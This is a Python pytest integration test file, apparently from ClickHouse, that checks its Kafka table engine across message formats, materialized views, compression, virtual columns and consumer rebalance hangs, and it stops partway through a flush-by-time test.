@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS
# and can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# the original problem appeared as the following sequence of messages in the librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# the first consumer subscribes to the topic, tries to poll some data, and goes idle
instance.query('SELECT * FROM test.kafka')
# the second consumer does the same and tries to poll some data,
# leading to a rebalance in the first consumer
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# the first consumer still has a pending, unprocessed rebalance callback (no poll after the select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
Regression test for UB in snappy-c (which is used in librdkafka);
the backport PR is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should be duplicated messages.
The original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': "localhost:{}".format(kafka_cluster.kafka_port)})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
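# Produce through the Kafka engine from 16 concurrent INSERT threads and verify that the
# materialized view ends up with every row (16 * 10000 = 160000 in total).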
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
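# Offsets must be committed per written block: after the Kafka table is dropped and re-created,
# consumption resumes without duplicating rows that were already written to the view.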
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
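# Check all virtual columns (_key, _topic, _partition, _offset, _timestamp, _timestamp_ms, _headers)
# over two topics with two partitions each.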
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
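# Check that _key and _timestamp can be supplied on INSERT through a Kafka engine table
# and read back via virtual columns on the consuming side.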
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
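# Sleep long enough for two time-based flushes with the default flush interval (7.5 sec).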
time.sleep(18)
